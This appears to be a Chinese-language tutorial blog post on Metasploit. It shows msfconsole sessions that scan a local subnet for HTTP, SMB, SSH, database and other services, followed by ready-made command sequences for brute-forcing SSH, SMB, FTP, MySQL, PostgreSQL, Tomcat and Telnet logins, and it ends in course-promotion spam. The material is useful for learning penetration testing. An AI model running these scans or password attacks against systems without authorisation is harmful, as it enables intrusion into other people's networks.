
MFS 服务扫描与爆破Metasploit是一款广泛使用的渗透测试工具和漏洞利用框架用于评估计算机系统、应用程序和网络的安全性。它最初由HD Moore开发后来由Rapid7公司维护和支持。Metasploit的主要功能包括漏洞扫描和利用Metasploit可以扫描目标系统识别潜在的漏洞并利用这些漏洞来获取对目标系统的访问权限。这包括操作系统漏洞、应用程序漏洞、服务漏洞等。Payload生成Metasploit可以生成各种Payload这是一段恶意代码用于在攻击成功后在目标系统上执行操作。这包括反向Shell、Meterpreter会话等。漏洞数据库Metasploit维护了一个广泛的漏洞数据库其中包含各种操作系统、应用程序和服务的漏洞信息使渗透测试人员能够快速识别目标系统上的漏洞。模块化框架Metasploit采用模块化的架构允许用户根据需要加载不同类型的模块例如扫描模块、利用模块、负载生成模块等。多种协议支持Metasploit支持多种网络协议和服务包括TCP、UDP、HTTP、HTTPS、FTP等使渗透测试人员能够测试各种类型的系统和应用程序。可视化界面Metasploit提供了一个基于Web的用户界面Metasploit Framework Web UI和命令行界面以满足不同用户的需求。社区和商业版本Metasploit拥有一个强大的社区版本Metasploit Framework同时也有商业版本Metasploit Pro后者提供了更多的高级功能和支持适用于企业和专业渗透测试人员。Metasploit框架MSF的服务发现功能是其一部分用于识别目标网络上运行的主机和服务。服务发现是渗透测试和漏洞评估的重要步骤帮助渗透测试人员确定目标系统的可攻击性和潜在漏洞。以下是MSF服务发现功能的概述主机探测Host DiscoveryMSF的服务发现功能可以执行主机探测通过向目标网络发送数据包并监听响应来确定哪些主机处于活动状态。这包括Ping扫描、ARP扫描、TCP和UDP扫描等。端口扫描Port Scanning一旦确定了活动主机MSF可以执行端口扫描以识别目标主机上开放的网络服务和端口号。这有助于确定哪些服务可能存在漏洞需要进一步的评估。服务识别Service Identification一旦确定了开放的端口MSF可以尝试识别每个端口上运行的具体服务和应用程序版本。这有助于渗透测试人员了解目标系统上使用的软件并查找已知的漏洞。操作系统识别OS FingerprintingMSF可以进行操作系统识别试图确定目标主机使用的操作系统类型和版本。这有助于选择合适的漏洞利用模块。脆弱性扫描Vulnerability ScanningMSF可以与漏洞数据库集成以自动识别目标系统上已知的漏洞。这可以帮助渗透测试人员快速找到潜在的攻击目标。自定义模块MSF的服务发现功能是高度可定制的用户可以根据需要创建自定义的模块和脚本来执行特定的服务发现任务。服务发现功能常用来发现局域网内,的常见服务,比如HTTP,FTP,TELNET等.MSF模块搜索[rootlocalhost ~]# msfconsole msf5 search scanner type:auxiliary msf5 search scanner/http type:auxiliary // 搜索所有与HTTP相关的模块发现HTTP服务:基于scanner/http/http_version发现HTTP服务.msf5 use scanner/http/http_version msf5 auxiliary(scanner/http/http_version) show options Module options (auxiliary/scanner/http/http_version): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 192.168.1.0/24 yes The target address range or CIDR identifier RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections THREADS 1 yes The number of concurrent threads VHOST no HTTP server virtual host msf5 auxiliary(scanner/http/http_version) set rhosts 192.168.1.0/24 rhosts 192.168.1.0/24 msf5 auxiliary(scanner/http/http_version) set rport 80 rport 80 msf5 auxiliary(scanner/http/http_version) exploit [] 192.168.1.7:80 Apache/2.4.6 (CentOS) PHP/5.4.16 ( Powered by PHP/5.4.16, 302-login.php ) [] 192.168.1.3:80 Apache/2.5.0 (CentOS) PHP/7.0.0 ( Powered by PHP/7.0.0, 302-admin.php ) [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed发现SMB服务:基于scanner/smb/smb_version发现SMB服务.msf5 use scanner/smb/smb_version msf5 auxiliary(scanner/smb/smb_version) show options Module options (auxiliary/scanner/smb/smb_version): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS 192.168.1.0/24 yes The target address range or CIDR identifier SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as THREADS 10 yes The number of concurrent threads msf5 auxiliary(scanner/smb/smb_version) set rhosts 192.168.1.0/24 rhosts 192.168.1.0/24 msf5 auxiliary(scanner/smb/smb_version) set threads 10 threads 10 msf5 auxiliary(scanner/smb/smb_version) exploit [] 192.168.1.2:445 - Host is running Windows 10 China (name:lyshark) (workgroup:lyshark) [*] 192.168.1.7:445 - Host could not be identified: Windows 6.1 (Samba 4.8.3) [*] 192.168.1.0/24:445 - Scanned 26 of 256 hosts (10% complete) [*] 192.168.1.0/24:445 - Caught interrupt from the console... [*] Auxiliary module execution completed发现FTP服务:基于scanner/ftp/ftp_version发现FTP服务msf5 use scanner/ftp/ftp_version msf5 auxiliary(scanner/ftp/ftp_version) show options Module options (auxiliary/scanner/ftp/ftp_version): Name Current Setting Required Description ---- --------------- -------- ----------- FTPPASS mozillaexample.com no The password for the specified username FTPUSER anonymous no The username to authenticate as RHOSTS 192.168.1.0/24 yes The target address range or CIDR identifier RPORT 21 yes The target port (TCP) THREADS 10 yes The number of concurrent threads msf5 auxiliary(scanner/ftp/ftp_version) set rhosts 192.168.1.0/24 rhosts 192.168.1.0/24 msf5 auxiliary(scanner/ftp/ftp_version) set threads 10 threads 10 msf5 auxiliary(scanner/ftp/ftp_version) exploit [] 192.168.1.7:21 - FTP Banner: 220 (vsFTPd 3.0.2)/x0d/x0a [*] 192.168.1.0/24:21 - Scanned 32 of 256 hosts (12% complete) [*] 192.168.1.0/24:21 - Caught interrupt from the console... [*] Auxiliary module execution completed发现SSH服务:基于auxiliary/scanner/ssh/ssh_version发现SSH服务msf5 use auxiliary/scanner/ssh/ssh_version msf5 auxiliary(scanner/ssh/ssh_version) show options Module options (auxiliary/scanner/ssh/ssh_version): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS 192.168.1.0/24 yes The target address range or CIDR identifier RPORT 22 yes The target port (TCP) THREADS 10 yes The number of concurrent threads TIMEOUT 30 yes Timeout for the SSH probe msf5 auxiliary(scanner/ssh/ssh_version) set rhosts 192.168.1.0/24 rhosts 192.168.1.0/24 msf5 auxiliary(scanner/ssh/ssh_version) set threads 10 threads 10 msf5 auxiliary(scanner/ssh/ssh_version) exploit [] 192.168.1.7:22 - SSH server version: SSH-2.0-OpenSSH_7.4 ( service.version7.4 service.vendorOpenBSD service.familyOpenSSH service.productOpenSSH service.cpe23cpe:/a:openbsd:openssh:7.4 service.protocolssh fingerprint_dbssh.banner ) [*] 192.168.1.0/24:22 - Caught interrupt from the console... [*] Auxiliary module execution completed发现Telnet服务:基于auxiliary/scanner/telnet/telnet_version发现TELNET服务msf5 use auxiliary/scanner/telnet/telnet_version msf5 auxiliary(scanner/telnet/telnet_version) show options Module options (auxiliary/scanner/telnet/telnet_version): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD no The password for the specified username RHOSTS 192.168.1.0/24 yes The target address range or CIDR identifier RPORT 23 yes The target port (TCP) THREADS 10 yes The number of concurrent threads TIMEOUT 30 yes Timeout for the Telnet probe USERNAME no The username to authenticate as msf5 auxiliary(scanner/telnet/telnet_version) set rhosts 192.168.1.0/24 rhosts 192.168.1.0/24 msf5 auxiliary(scanner/telnet/telnet_version) set threads 10 threads 10 msf5 auxiliary(scanner/telnet/telnet_version) exploit [-] 192.168.1.1:23 - A network issue has occurred: The connection was refused by the remote host (192.168.1.1:23). [-] 192.168.1.7:23 - A network issue has occurred: The connection was refused by the remote host (192.168.1.7:23). [-] 192.168.1.0:23 - A network issue has occurred: The host (192.168.1.0:23) was unreachable. [-] 192.168.1.10:23 - A network issue has occurred: The connection was refused by the remote host (192.168.1.10:23). [-] 192.168.1.3:23 - A network issue has occurred: The connection was refused by the remote host (192.168.1.3:23). [-] 192.168.1.5:23 - A network issue has occurred: The host (192.168.1.5:23) was unreachable. [*] 192.168.1.0/24:23 - Caught interrupt from the console... [*] Auxiliary module execution completed发现MySQL服务:基于auxiliary/scanner/mysql/mysql_version发现mysql服务msf5 use auxiliary/scanner/mysql/mysql_version msf5 auxiliary(scanner/mysql/mysql_version) show options Module options (auxiliary/scanner/mysql/mysql_version): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS 192.168.1.7 yes The target address range or CIDR identifier RPORT 3306 yes The target port (TCP) THREADS 1 yes The number of concurrent threads msf5 auxiliary(scanner/mysql/mysql_version) set rhosts 192.168.1.7 rhosts 192.168.1.7 msf5 auxiliary(scanner/mysql/mysql_version) set rport 3306 rport 3306 msf5 auxiliary(scanner/mysql/mysql_version) exploit [*] 192.168.1.7:3306 - 192.168.1.7:3306 is running MySQL, but responds with an error: /x04Host 192.168.1.7 is not allowed to connect to this MariaDB server [*] 192.168.1.7:3306 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed发现MSSQL服务:基于auxiliary/scanner/mssql/mssql_ping发现SQL Server服务msf5 use auxiliary/scanner/mssql/mssql_ping msf5 auxiliary(scanner/mssql/mssql_ping) show options Module options (auxiliary/scanner/mssql/mssql_ping): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD no The password for the specified username RHOSTS 192.168.1.0/24 yes The target address range or CIDR identifier TDSENCRYPTION false yes Use TLS/SSL for TDS data Force Encryption THREADS 10 yes The number of concurrent threads USERNAME sa no The username to authenticate as USE_WINDOWS_AUTHENT false yes Use windows authentification (requires DOMAIN option set) msf5 auxiliary(scanner/mssql/mssql_ping) set rhosts 192.168.1.0/24 rhosts 192.168.1.0/24 msf5 auxiliary(scanner/mssql/mssql_ping) set threads 10 threads 10 msf5 auxiliary(scanner/mssql/mssql_ping) run发现Oracle服务:基于auxiliary/scanner/oracle/tnslsnr_version发现Oracle服务msf5 use auxiliary/scanner/oracle/tnslsnr_version msf5 auxiliary(scanner/oracle/tnslsnr_version) show options Module options (auxiliary/scanner/oracle/tnslsnr_version): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS 192.168.1.0/24 yes The target address range or CIDR identifier RPORT 1521 yes The target port (TCP) THREADS 10 yes The number of concurrent threads msf5 auxiliary(scanner/oracle/tnslsnr_version) set rhosts 192.168.1.0/24 rhosts 192.168.1.0/24 msf5 auxiliary(scanner/oracle/tnslsnr_version) set threads 10 threads 10 msf5 auxiliary(scanner/oracle/tnslsnr_version) run主机发现功能MSF提供了一些辅助模块,可以实现主机发现这些辅助模块位于Metasploit框架的modules/auxiliary/scanner/discovery/目录中用于实现主机发现和网络探测。它们包括arp/_sweep用于执行ARP扫描以确定目标网络上的活动主机。ipv6/_multicast/_ping针对IPv6网络的多播Ping扫描用于识别IPv6网络中的主机。ipv6/_neighbor 和 ipv6/_neighbor/_router/_advertisement用于IPv6网络的邻居发现和路由器广告扫描有助于确定IPv6网络上的主机和路由器。udp/_probe 和 udp/_sweep用于UDP端口扫描以确定目标主机上开放的UDP端口。使用模块可帮助渗透测试人员识别目标网络上的潜在攻击目标例如活动主机和开放端口。使用这些模块时渗透测试人员可以更好地了解目标网络的结构和漏洞以进行进一步的评估和测试。ARP发现内网主机:基于scanner/discovery/arp_sweep发现内网存活主机.msf5 use scanner/discovery/arp_sweep msf5 auxiliary(scanner/discovery/arp_sweep) show options Module options (auxiliary/scanner/discovery/arp_sweep): Name Current Setting Required Description ---- --------------- -------- ----------- INTERFACE no The name of the interface RHOSTS 192.168.1.0/24 yes The target address range or CIDR identifier SHOST no Source IP Address SMAC no Source MAC Address THREADS 10 yes The number of concurrent threads TIMEOUT 5 yes The number of seconds to wait for new data msf5 auxiliary(scanner/discovery/arp_sweep) set rhosts 192.168.1.0/24 rhosts 192.168.1.0/24 msf5 auxiliary(scanner/discovery/arp_sweep) set threads 10 threads 10 msf5 auxiliary(scanner/discovery/arp_sweep) exploit [] 192.168.1.1 appears to be up (UNKNOWN). [] 192.168.1.2 appears to be up (UNKNOWN). [] 192.168.1.2 appears to be up (UNKNOWN). [] 192.168.1.1 appears to be up (UNKNOWN). [*] Scanned 256 of 256 hosts (100% complete) [*] Auxiliary module execution completedUDP发现内网主机:基于scanner/discovery/udp_sweep发现内网存活主机.msf5 use scanner/discovery/udp_sweep msf5 auxiliary(scanner/discovery/udp_sweep) show options Module options (auxiliary/scanner/discovery/udp_sweep): Name Current Setting Required Description ---- --------------- -------- ----------- BATCHSIZE 256 yes The number of hosts to probe in each set RHOSTS 192.168.1.0/24 yes The target address range or CIDR identifier THREADS 10 yes The number of concurrent threads msf5 auxiliary(scanner/discovery/udp_sweep) set rhosts 192.168.1.0/24 rhosts 192.168.1.0/24 msf5 auxiliary(scanner/discovery/udp_sweep) exploit [*] Sending 13 probes to 192.168.1.0-192.168.1.255 (256 hosts) [*] Discovered NetBIOS on 192.168.1.2:137 (lyshark:20:U :lysahrk:00:U :lyshark:00:G :WORKGROUP:1e:G :WORKGROUP:1d:U :__MSBROWSE__:01:G :a4:be:c8:fe:ac:z4) [*] Scanned 256 of 256 hosts (100% complete) [*] Auxiliary module execution completedACK发现内网主机:基于auxiliary/scanner/portscan/ack扫描内网存活主机.msf5 use auxiliary/scanner/portscan/ack msf5 auxiliary(scanner/portscan/ack) show options Module options (auxiliary/scanner/portscan/ack): Name Current Setting Required Description ---- --------------- -------- ----------- BATCHSIZE 256 yes The number of hosts to scan per set DELAY 0 yes The delay between connections, per thread, in milliseconds INTERFACE no The name of the interface JITTER 0 yes The delay jitter factor (maximum value by which to /- DELAY) in milliseconds. PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900) RHOSTS 192.168.1.7 yes The target address range or CIDR identifier SNAPLEN 65535 yes The number of bytes to capture THREADS 10 yes The number of concurrent threads TIMEOUT 500 yes The reply read timeout in milliseconds msf5 auxiliary(scanner/portscan/ack) set rhosts 192.168.1.7 rhosts 192.168.1.7 msf5 auxiliary(scanner/portscan/ack) set threads 10 threads 10 msf5 auxiliary(scanner/portscan/ack) exploit [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completedSYN发现内网主机:基于auxiliary/scanner/portscan/syn扫描内网存活主机.msf5 use auxiliary/scanner/portscan/syn msf5 auxiliary(scanner/portscan/syn) show options Module options (auxiliary/scanner/portscan/syn): Name Current Setting Required Description ---- --------------- -------- ----------- BATCHSIZE 256 yes The number of hosts to scan per set DELAY 0 yes The delay between connections, per thread, in milliseconds INTERFACE no The name of the interface JITTER 0 yes The delay jitter factor (maximum value by which to /- DELAY) in milliseconds. PORTS 1-1024 yes Ports to scan (e.g. 22-25,80,110-900) RHOSTS 192.168.1.7 yes The target address range or CIDR identifier SNAPLEN 65535 yes The number of bytes to capture THREADS 10 yes The number of concurrent threads TIMEOUT 500 yes The reply read timeout in milliseconds msf5 auxiliary(scanner/portscan/syn) set rhosts 192.168.1.7 rhosts 192.168.1.7 msf5 auxiliary(scanner/portscan/syn) set threads 10 threads 10 msf5 auxiliary(scanner/portscan/syn) runTCP发现内网主机:基于auxiliary/scanner/portscan/tcp扫描内网存活主机.msf5 use auxiliary/scanner/portscan/tcp msf5 auxiliary(scanner/portscan/tcp) show options Module options (auxiliary/scanner/portscan/tcp): Name Current Setting Required Description ---- --------------- -------- ----------- CONCURRENCY 10 yes The number of concurrent ports to check per host DELAY 0 yes The delay between connections, per thread, in milliseconds JITTER 0 yes The delay jitter factor (maximum value by which to /- DELAY) in milliseconds. PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900) RHOSTS 192.168.1.7 yes The target address range or CIDR identifier THREADS 10 yes The number of concurrent threads TIMEOUT 1000 yes The socket connect timeout in milliseconds msf5 auxiliary(scanner/portscan/tcp) set rhosts 192.168.1.7 rhosts 192.168.1.7 msf5 auxiliary(scanner/portscan/tcp) set threads 10 threads 10 msf5 auxiliary(scanner/portscan/tcp) run [] 192.168.1.7: - 192.168.1.7:21 - TCP OPEN [] 192.168.1.7: - 192.168.1.7:22 - TCP OPEN [] 192.168.1.7: - 192.168.1.7:80 - TCP OPEN [] 192.168.1.7: - 192.168.1.7:139 - TCP OPEN [] 192.168.1.7: - 192.168.1.7:445 - TCP OPEN [*] 192.168.1.7: - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed服务爆破功能了解了目标主机上的开放服务后渗透测试人员可能会尝试使用字典攻击来爆破登录凭据以验证是否能够成功进一步渗透。以下是一些常见的服务爆破的配置示例这些示例演示了如何设置爆破工具例如Metasploit或Hydra来进行字典攻击。这里只是演示配置实际爆破可能需要获得授权并遵守法律和道德规定。SSH口令爆破use auxiliary/scanner/ssh/ssh_login set rhosts 192.168.1.7 set username root set pass_file /root/pass.txt set threads 10 exploitSamba口令爆破use auxiliary/scanner/smb/smb_login set rhosts 192.168.1.7 set user_file /root/user.txt set pass_file /root/pass.txt set threads 10 exploitFTP口令爆破use scanner/ftp/ftp_login set rhosts 192.168.1.7 set user_file /root/user.txt set pass_file /root/pass.txt set threads 10 exploitMySQL口令爆破search mysql use auxiliary/scanner/mysql/mysql_login set rhosts 192.168.1.7 set user_file /root/user.txt set pass_file /root/pass.txt exploitPostgresql口令爆破use auxiliary/scanner/postgres/postgres_login set rhosts 192.168.1.7 set user_file /root/user.txt set pass_file /root/pass.txt exploitTomcat口令爆破search tomcat use auxiliary/scanner/http/tomcat_mgr_login set rhosts 192.168.1.7 set user_file /root/user.txt set pass_file /root/pass.txt exploitTelnet口令爆破use auxiliary/scanner/telnet/telnet_login set rhosts 192.168.1.7 set username administrator set pass_file /root/pass.txt exploit《网络安全从零到精通全套学习大礼包》96节从入门到精通的全套视频教程免费领取如果你也想通过学网络安全技术去帮助就业和转行我可以把我自己亲自录制的96节 从零基础到精通的视频教程以及配套学习资料无偿分享给你。网络安全学习路线图想要学习 网络安全作为新手一定要先按照路线图学习方向不对努力白费。对于从来没有接触过网络安全的同学我帮大家准备了从零基础到精通学习成长路线图以及学习规划。可以说是最科学最系统的学习路线大家跟着这个路线图学习准没错。配套实战项目/源码所有视频教程所涉及的实战项目和项目源码学习电子书籍学习网络安全必看的书籍和文章的PDF市面上网络安全书籍确实太多了这些是我精选出来的面试真题/经验以上资料如何领取